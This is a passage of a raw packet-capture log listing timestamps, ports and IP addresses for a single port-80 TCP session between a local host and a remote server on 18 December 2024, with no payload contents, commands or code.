Dec 18, 2024 13:38:13.980397940 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.980444908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.980503082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.981414080 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.981482029 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.981501102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.981533051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.982417107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.982484102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.982516050 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.982570887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.983344078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.983397007 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.983453035 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.984318018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.984371901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.984386921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.984419107 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.985351086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.985403061 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.985450983 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.985450983 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.986361027 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.986453056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.986542940 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.987304926 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.987373114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.987380981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.987442970 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.988322973 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.988399982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.988428116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.988490105 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.989310026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.989377022 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.989612103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.989671946 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.990281105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.990495920 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.990559101 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.991262913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.991348028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.991390944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.991462946 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.992263079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.992335081 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.992418051 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.992477894 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.993261099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.993326902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.993360996 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.993422985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.994251013 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.994311094 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.994379044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.995277882 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.995358944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.995418072 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.995491982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.996260881 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.996320009 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.996403933 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.996475935 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.997262955 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.997323036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.997391939 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.997452021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.998318911 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.998380899 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.998423100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.998480082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.999254942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.999392033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.999455929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.000319958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.000382900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.000452995 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.000514030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.001317024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.001379967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.001408100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.001465082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.002315044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.002486944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.002557039 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.003346920 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.003411055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.003504992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.003566980 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.004316092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.004369974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.004375935 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.004432917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.005311966 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.005379915 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.005449057 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.005503893 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.006304979 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.006489038 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.006571054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.007371902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.007436037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.007508039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.007571936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.008373976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.008440018 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.008464098 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.008524895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.009318113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.009372950 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.009424925 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.009483099 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.010302067 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.010355949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.010441065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.010507107 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.011356115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.011408091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.011435032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.011466026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.012365103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.012434959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.151911974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.151954889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.152048111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.152371883 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.152420044 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.152493954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.152539968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.153033018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.153079987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.153155088 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.153197050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.154109001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.154154062 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.154167891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.154207945 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.155062914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.155112028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.155164957 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.155206919 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.156033993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.156081915 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.156224012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.156286001 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.157140017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.157191992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.157202005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.157241106 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.158088923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.158140898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.158179998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.158222914 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.159323931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.159372091 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.159478903 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.159524918 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.160440922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.160495043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.160617113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.160659075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.161043882 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.161093950 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.161165953 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.161211014 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.162070036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.162115097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.162242889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.162286043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.163084984 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.163137913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.163160086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.163206100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.164068937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.164120913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.164267063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.164313078 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.165060043 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.165107965 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.165180922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.165224075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.166091919 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.166264057 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.166320086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.167196989 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.167208910 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.167260885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.168211937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.168272972 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.168287992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.168334961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.169064999 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.169121981 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.169203997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.169251919 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.170226097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.170274019 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.170293093 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.170332909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.171097040 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.171159029 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.171427011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.171474934 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.172136068 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.172213078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.172254086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.172302961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.173108101 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.173156977 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.173202038 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.174079895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.174170017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.174235106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.174277067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.175086021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.175268888 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.175322056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.176186085 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.176253080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.176348925 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.176394939 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.177059889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.177124023 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.177342892 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.177386045 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.178153038 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.178232908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.178276062 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.179115057 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.179174900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.179203987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.179246902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.180073023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.180149078 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.180188894 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.180299044 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.181118965 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.181216002 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.181260109 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.182082891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.182128906 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.182224035 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.182292938 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.183192968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.183288097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.183326006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.184111118 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.184168100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.184200048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.184242964 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.185092926 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.185158968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.185201883 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.185236931 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.186068058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.186182976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.186227083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.187181950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.187302113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.187320948 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.187351942 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.188110113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.188164949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.188235044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.188275099 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.189095974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.189171076 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.189188957 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.189229012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.190099001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.190143108 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.190296888 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.190336943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.191111088 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.191174030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.191207886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.191246986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.192269087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.192327976 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.192353964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.192447901 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.193310022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.193351030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.193416119 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.193453074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.194252014 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.194327116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.194375038 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.195112944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.195161104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.195286036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.195324898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.196176052 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.196187973 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.196232080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.196250916 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.197225094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.197477102 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.197532892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.198169947 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.198225021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.198388100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.198529959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.199208975 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.199310064 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.199353933 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.199403048 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.200253010 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.200315952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.200361967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.200403929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.201128006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.201186895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.201258898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.201653957 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.202205896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.202310085 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.202352047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.203243017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.203263998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.203289032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.203325987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.204154968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.205796003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.344319105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.344343901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.344517946 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.344598055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.344655991 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.344681025 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.344827890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.345470905 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.345530987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.345561981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.345608950 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.346477032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.346544981 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.346627951 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.346681118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.347486019 CET	80	49708	31.41.244.11	192.168.2.8
